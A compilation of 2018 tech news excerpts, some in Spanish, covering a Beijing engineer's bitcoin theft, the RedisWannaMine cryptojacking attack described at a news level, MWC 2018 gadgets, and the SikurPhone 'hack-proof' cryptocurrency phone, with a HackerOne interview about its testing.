Chinese Engineer Arrested for Stealing 100 Bitcoin From His Own Company

By: Avi Mizrahi

Who Watches the Watchmen? An engineer from Beijing has been arrested after allegedly discovering a failed hacking attempt to his company and taking advantage of the situation to steal some of the money for himself. 90% of the loot has been returned but he can still go to jail for as much as seven years.

An Inside Job

Zhong Mo, a tech company employee, allegedly used his position to steal 100 bitcoins from his employer. The Haidian police recently confirmed his arrest for the crime of illegally acquiring computer information. Haidian is the area where most universities are located in Beijing and contains the Zhongguancun electronics district where many tech companies have their Chinese headquarters, locally known as “China’s Silicon Valley.”

The prosecutors of the Science and Technology Criminal Investigation Department of Haidian investigated the case and found that the accused was an operation and maintenance engineer of a technology company. The claims are that during a routine maintenance of the company’s server, he found out that someone tried to steal the company’s cryptocurrency by hacking, but failed. After eliminating the abnormal interference, the engineer used his administrator’s authority to log in to the server himself and insert a piece of code to transfer 100 bitcoins from the company’s holdings to his own account registered on a website outside China. He also tried to eliminate traces of the act, taking steps to avoid tracking.

The Thief Falls Victim to Another Crime

After losing 10 bitcoins to a phishing scam and apparently getting cold feet, the employee returned the remaining 90 bitcoins to the company. According to the exchange rate at the time of the incident, September 16, 2017, 100 bitcoins were worth about $380,000. Local reports claim that this is the first case of bitcoin theft handled by the police in Beijing.

More: https://news.bitcoin.com/chinese-engineer-arrested-for-stealing-100-bitcoin-from-his-own-company/?utm_source=OneSignal%20Push&&utm_medium=notification&&utm_campaign=Push%20Notifications

Cryptojacking attack uses leaked EternalBlue NSA exploit to infect servers.

By: Charlie Osborne

RedisWannaMine is a sophisticated attack which targets servers to fraudulently mine cryptocurrency.

Researchers have uncovered a new cryptojacking scheme which utilizes the leaked NSA exploit EternalBlue to infect vulnerable Windows servers.
On Thursday, security professionals from Imperva revealed the attack, warning that this latest scheme is far more sophisticated than most recorded cryptojacking attempts, which are generally rather simple in nature.

The new attack, called RedisWannaMine, targets servers to mine cryptocurrency and “demonstrates a worm-like behavior combined with advanced exploits to increase the attackers’ infection rate and fatten their [operator] wallets.”

When a target server has been identified, the malware exploits CVE-2017-9805, an Apache Struts vulnerability which impacts the Struts REST plugin with XStream handler.

If exploited, the security flaw allows attackers to remotely execute code without authentication on an application server.

This vulnerability is used by the attackers to run a shell command which downloads cryptocurrency mining malware.

However, the downloader used is more sophisticated than usual, as it also gains persistency through new server entries in crontab, and gains remote access to a victim machine through new SSH key entries in the authorized keys sector, as well as the system’s iptables.

Other packages are also downloaded using standard Linux package managers, and one particular GitHub tool, a TCP port scanner called masscan, is also included in the payload.

More: https://www-zdnet-com.cdn.ampproject.org/c/www.zdnet.com/google-amp/article/cryptojacking-attack-uses-leaked-nsa-exploit/

Este móvil es una cartera ultra segura para criptomonedas.

By: JORGE SANZ FERNÁNDEZ

El auge de las criptomonedas estás crean en sí mismo nuevos segmentos y nichos de mercado en la escena móvil. Los móviles ultra seguros y encriptados siempre han existido, pero con el paso del tiempo se van adaptando a las nuevas tecnologías y tendencias. Y en esta ocasión desde la compañía SIKUR han querido crear un móvil de gama media ultra seguroorientado a las criptomonedas. O lo que es lo mismo, un dispositivo tan seguro que podemos llevar en él todo lo referente a nuestras inversiones en estas monedas virtuales sin temor ataques y hackeos.

Es imposible de hackear

La mayor amenaza para nuestra cartera de criptomonedas son los hackeos, y precisamente este móvil lo que nos ofrece es una seguridad total a la hora de gestionar nuestra cartera de Bitcoin u otra criptomoneda.

Por eso desde SIKUR aseguran que su móvil no se puede hackear. De hecho ofrecieron a una empresa con grandes conocimientos en hackeos, como es HackerOne ,dos meses para hackear este móvil, y les fue imposible. Por lo demás cuenta con un procesador de gama media MediaTek, 4GB de RAM, pantalla de 5,5 pulgadas Full HD, Android 7 y la imposibilidad de instalar otras apps que no sean de SIKUR. Sólo se venderán 20000 unidades a un precio de 800 dólares, muy elevado, pero en este caso justificado, porque pagamos en seguridad para nuestras criptomonedas.

MORE: https://cincodias.elpais.com/cincodias/2018/03/02/smartphones/1519987623_886122.html

The 9 most exciting phones and gadgets from MWC 2018.

By: JEFFREY VAN CAMP

Every spring, the smartphone world revolves around Mobile World Congress. Exhibitors and attendees from more than 200 countries congregate in the halls of the Fira Gran Via in Barcelona, Spain, debuting the latest in mobile tech. MWC is the largest mobile trade show on Earth. We’ve surveyed the announcements from every major tech company at the show this week. Here are the highlights.
01
Samsung Galaxy S9
PRICE$720
With the Galaxy S9, Samsung is doubling down on its winning formula. The new GS9 and S9+ have all the features Galaxy phones are known for, plus a few additions. Samsung moved the fingerprint sensor away from the camera so you won’t smudge the lens anymore, and photo performance in low light is improved thanks to the camera’s variable-aperture system. You also get Apple-inspired animated emoji and a new DeX dock that turns the phone into a desktop PC. Ships March 16 for $720. Choose the unlocked option. And did we mention it comes in Lilac Purple?
02
Nokia 8110 4G
Remember that phone from The Matrix where the receiver panel slid out to reveal the number pad? Take the blue pill because it’s back, courtesy of HMD Global, which now makes Nokia phones. The new Nokia 8110 comes shaped and colored like a banana too. The battery lasts over three weeks, but if you’re hoping for Android apps, look elsewhere. This is a standard old-school feature phone with its own download store—and, in true retro fashion, it comes with a copy of Snake.
03
Huawei MateBook X Pro
Just when you think there are no new capabilities to squeeze out of laptops, Huawei pushes the envelope. The new MateBook X Pro has a remarkable 14-inch 3,000 x 2,000 pixel touchscreen with such small bezels that it fits into a standard 12-inch notebook chassis. Huawei claims this ultraportable has the highest screen-to-body ratio of any laptop in the world. It’s also loaded with the latest Intel 8th Generation Core chips, an Nvidia GeForce MX150 graphics card, four Dolby Atmos-approved speakers, a fingerprint sensor, and 12-plus hours of battery life. The coolest detail: a webcam pops out of one of the function keys on the keyboard like the headlights on an old Corvette.
08
SikurPhone
Usually, a new phone at MWC will boast a fancy new screen or camera, but the SikurPhone’s sales pitch is strong security and data encryption. It claims that the SikurPhone is “hack-proof” and that its bespoke wallet app is the perfect way to keep your cryptocurrencies safe. It’s an Android phone with encryption plastered all over it, and a custom app store that only includes vetted apps. To back its claims, the company hired bug bounty hunters HackerOne to try to crack the phone. So far, the experts have failed. Sikur is asking $850 for the device, but that price includes peace of mind.

Presentan un teléfono seguro para invertir en bitcoins: ¿de qué se trata?

By: Desiree Jaimovich

Barcelona (enviada especial). SikurPhone es un teléfono diseñado especialmente para los que tienen (o están interesados en tener) inversiones en bitcoins. Se supone que ofrece mayor comodidad y seguridad para gestionar las criptomonedas por varios motivos.

El teléfono tiene un sistema operativo “propio”, que en realidad no es más que una versión personalizada del Android 7.0. Desde el celular no se pueden bajar aplicaciones de Google Play, sino solo aquellas que estén diseñadas especialmente dentro del ecosistema de la empresa.

Al no estar en contacto con apps de terceros, el móvil está menos expuesto a ser hackeado, destaca Alexandre Vasconcelos, vocero de Sikur. Esto es un buen punto, teniendo en cuenta que tan solo en 2017, Google tuvo que eliminar unas 700 mil aplicaciones maliciosas y expulsar a más de 100 mil desarrolladores de su tienda virtual, por intentar afectar los dispositivos de los 2 mil millones de usuarios de Android que hay en el mundo.

Los creadores del teléfono dicen que tan sólo en la última semana sometieron el equipo al testeo de un centenar de hackers y ninguno logró romper las barreras de seguridad del sistema

MORE: https://www.infobae.com/america/tecno/2018/03/01/presentan-un-telefono-seguro-para-invertir-en-bitcoins-de-que-se-trata/

Security-Focused ‘SIKURPhone’ Announced at MWC 2018

By: AFP Relaxnews

Earlier this week at the MWC 2018 in Barcelona, German cybersecurity company Sikur, launched SIKURPhone, a smartphone designed to protect data as well as cryptocurrency

Sikur’s new encrypted smartphone has been tried and tested by hackers, to ensure users’ cryptocurrencies, such as Bitcoin, are safe from theft. Such a device may have only appealed to those carrying around delicate corporate data or sensitive government documents a few years ago. But in today’s world of hackers, set on trying their luck in a cryptocurrency market worth over $460 billion, a lot more people have a lot more to lose.

SIKURPhone is ultimately a practical choice rather than a flashy one — the specs remain mediocre and nowhere near those of a flagship item. A little smaller than an iPhone, the device has a 5.5-inch full high definition ‘gorilla glass’ display, 4GB of RAM, 64GB of storage, a 13MP rear camera and a 5MP front camera. Where it does stand out from the crowd is in its “unhackable” built-in cryptocurrency wallet, tailored to safeguard digital coins, such as Bitcoin. The company is so confident about its new device that it even put it to the test, hiring professional hackers to do “rigorous hacking tests for two months.” Hackers ultimately failed to break in.

SIKURPhone essentially runs on Android, although it is an altered version that provides the basics: calls, messages, document storage, etc. As for third-party apps, such as Instagram and Facebook, they will eventually be accessible but not before being vetted for privacy concerns by the company. According to Sikur, the phone’s fingerprint authentication function can also be used to recover personal data in the case of a lost device or a forgotten password.

More: https://www.news18.com/news/tech/security-focused-sikurphone-announced-at-mwc-2018-1674481.html

SikurPhone With a Secure Cryptocurrency Wallet Unveiled at MWC 2018.

By: Jagmeet Singh

A long time after launching its security-focused GranitePhone, Brazil’s Sikur at Mobile World Congress (MWC) 2018 in Barcelona on Tuesday brought the SikurPhone that helps you protect your cryptocurrency. The new smartphone comes with a pre-installed cryptocurrency wallet and includes cloud integration to securely store various cryptocurrencies under one roof. Pre-orders for 20,000 units for the SikurPhone have already started at a promotional price of $799 (roughly Rs. 52,100), while the units will ship sometime in August this year.

The SikurPhone is touted to be “hack proof”, protecting user data as well as cryptocurrencies from hackers. To test how the phone can protect users, Sikur hired ethical hackers from bug bounty company HackerOne between November and December who were failed to gain access to any information, as per COO Alexandre Vasconcelos. The company deployed a custom Android version on SikurPhone, which it calls SikurOS, that doesn’t allow you to install any of the third-party apps on your own. This doesn’t mean that the smartphone won’t support your favourite apps – you instead need to ask the Sikur team to configure the apps individually.

Vasconcelos, in an interaction with CNET, pointed out that while the SikurPhone is designed to protect user data, it will not give the same tough protection to save criminals. The executive highlighted that the company would disable access to its services if it gets hints of any criminal behaviour of a user. In a separate interview with Mashable, Vasconcelos revealed that the Sikur will not only secure your digital currencies through its cloud-connected wallet but will also remotely wipe the data in case if you lose your phone to protect your money. “If you lose your phone, we can remotely wipe it for you. You can get a new one, log in, and your funds will be safe, as your private keys are stored in our cloud,” he said.

The SikurPhone additionally includes fingerprint authentication, and the preloaded wallet offers up-to-date market information about pricing, cryptocurrency news, and quotes. The wallet also has multisignature (P2SH) and multiple wallet support to give you an extensive cryptocurrency platform.

On the specification side, the Android 7.0 Nougat-based SikurPhone features a 5.5-inch full-HD display with Gorilla Glass protection on top. It is powered by a MediaTek MT6750 SoC, coupled with 4GB of RAM and has 13-megapixel rear camera sensor and a front camera sensor. Also, there is 64GB of onboard storage and a 2800mAh battery.

More: https://gadgets.ndtv.com/mobiles/news/sikurphone-cryptocurrency-wallet-mwc-2018-1818260

Encrypted SIKURPhone protects data and cryptocurrency

By: Rob LeFebvre

The security-focused Granite Phone captured the interest of even non-corporate customers when it came out in 2015. Now the folks at Sikur are back with a next-generation , promising the first fully encrypted, hack-proof smartphone that can safely store cryptocurrencies. Only 20,000 units will be available for presale beginning February 27th at a promotional price of $799. The company expects to deliver them in August of this year.

The phone itself has a 5.5-inch “full HD” Gorilla Glass display, 4GB of RAM, 64GB of storage, a 13MP rear and 5MP front camera and sports a 2800 mAh battery. SIKURPhone also sports fingerprint authentication, which the company claims can help recover personal data if the device gets lost or you forget your password. It runs a fork of Android, and any third-party apps must be vetted and confirmed by the company before they’re available in an upcoming app store.

When the original Granite Phone came out, it was essentially for security-conscious governmental and corporate users, but the device found a pretty strong foothold with everyday consumers. SIKURPhone adds a secure cryptocurrency wallet along with its secure OS, communication systems and third-party apps. “Securely storing information on our devices is one of our strong points,” said CEO Cristiano Iop. “We succeeded with browser and messaging security. Then we asked, why not do it with ? Cryptos are stored seamlessly and securely on our cloud, without compromising safety.”

MORE: https://www.engadget.com/2018/02/27/sikurphone-encrypted-data-cryptocurrency-pre-order/

There’s a $799 hack-proof smartphone designed to keep your cryptocurrencies safe

By: ARJUN KHARPAL

by Arjun Kharpal

February 27, 2018

A smartphone designed to keep cryptocurrencies like bitcoin safe was unveiled on Tuesday.

German cybersecurity firm Sikur launched the $799 SIKURPhone at the Mobile World Congress in Barcelona, Spain.

Key features include:

  • 5.5-inch full high definition display
  • 13 megapixel rear camera

But the standout feature for the device is the in-built cryptocurrency wallet. A wallet is a piece of software required to hold cryptocurrencies.

Security of cryptocurrency exchanges and wallets has been in the spotlight recently. A recent incident saw hackers steal over $500 million from Japanese cryptocurrency exchange Coincheck.

The cryptocurrency market has exploded with a value of over $460 billion, from just $21.4 billion a year ago, according to data from Coinmarketcap.com.

Sikur said it put its device to the test by hiring professional hackers to attack the device. The company claims the smartphone was subjected to “rigorous hacking tests for two months,” but hackers failed to gain access to any information.

“At the end of second quarter of 2018 we will deliver a crypto wallet inside our platform, expanding the wallet use beyond SIKURPhone, it means that our customers should be able, through a physical device, to securely store their cryptocoins,” Cristiano Lop, Sikur’s CEO, told CNBC by email.

The SIKURPhone will be available in a pre-sale on February 27 at a price of $799, and the first units will be delivered in August 2018. Only 20,000 units will be available at this price.

Source: https://www.cnbc.com/2018/02/27/sikur-cryptocurrency-wallet-smartphone.html

Sikur’s COO: Hacker diversity essential in securing SIKURPhone

By: Hacker One

German cybersecurity company, Sikur, has high demands for security – it’s Secure Communication Platform is utilized by governments, corporations, and high-level executives.

In addition, the company just announced a new cryptocurrency wallet for its secure mobile device, SIKURPhone at Mobile World Congress in Barcelona.

Ahead of this new product launch, Sikur ran a HackerOne challenge with highly skilled hackers focused on everything from hardware, to software to physical phone theft. We chatted with Sikur COO Alexandre Vasconcelos, who was in charge of the program, to learn more about how hackers serves as an essential component of Sikur’s overall security strategy.

Why did you choose to run a hacker-powered security test versus a standard penetration test?

When crafting such device with a specific purpose our goal is to keep user information safe from any prying eyes, so when submitting the SIKURPhone to researchers we expected that would test things that we had missed.

A standard penetration test may depend on the unique ability of the tester who – by the way – can be an exceptional tester, but it will not cover all the product technical aspects. On the flip side, a hacker-powered test is far more extensive, due to its nature of having more testers and with different backgrounds, which contributes to the hacking process. By this approach, the program is more effective and proved that our device has accomplished its purpose, keeping user information (stored locally, in the cloud or in transit) secure from any third-party.

You focused on three test plan areas: accessing a “stolen” phone, breaking a purchased phone, and intercepting data. Why these three areas?

That’s because we think that those are the most common situations where hacking occurs. When a malicious person gains access to your device, chances are that a local exploitable flaw may be found. Having researchers help to prove that was crucial to our product.

The proposed “stolen” phone scenarios were important to set real world situations that, where any user could face. Our goal was to prove that users would benefit from SIKURPhone security, keeping their information safe even in the worst situations, like a device theft.

There were no limitations during the testing phase, hackers were allowed – and encouraged – to search for hardware and software vulnerabilities.

Did they find any vulnerabilities that surprised you (no need to name the vulnerability, just explain the process or why it was surprising)?

In fact, we’ve got surprised by the way that hackers worked to find the issues, the approach was very interesting and effective.

Talk to us about the hardware component of your challenge and how its different from software-based security.

Hardware is far more difficult, because it has some very particular components that works together with software. Also, when it comes to hardware, when a vulnerability is found, deeper testing is needed to guarantee that the fix will not affect other components.

We do have some engineers with hardware expertise, and it is a very particular profile, as they also need to have software skills to help implement the solution as a hacker would, thus setting the security bar higher. HackerOne helped us a lot to find the right hacker profile for our challenge; they did a very good job.

How did HackerOne’s managed services (triage) help you and your team during the Challenge?

The triaging service is crucial to both sides, so that hacker can have a better understanding on how the customer’s product works, and on the flip side the customer may have a clearer understanding about the hacker approach to a given situation. Somethings that may seem to be an issue are made by design, and some can be classified as bugs. The triage service gave us room to work on those situations.

How did the hacker-powered penetration test via HackerOne Challenge compare with your past penetration tests?

We did have some tests before, but as technology and hacking techniques evolve, there is always something to learn and improve. We always learn something new. In this challenge we gained a lot of knowledge that will help to improve our skills.

MORE: https://www.hackerone.com/blog/Sikurs-COO-Hacker-Diversity-Essential-Securing-SIKURPhone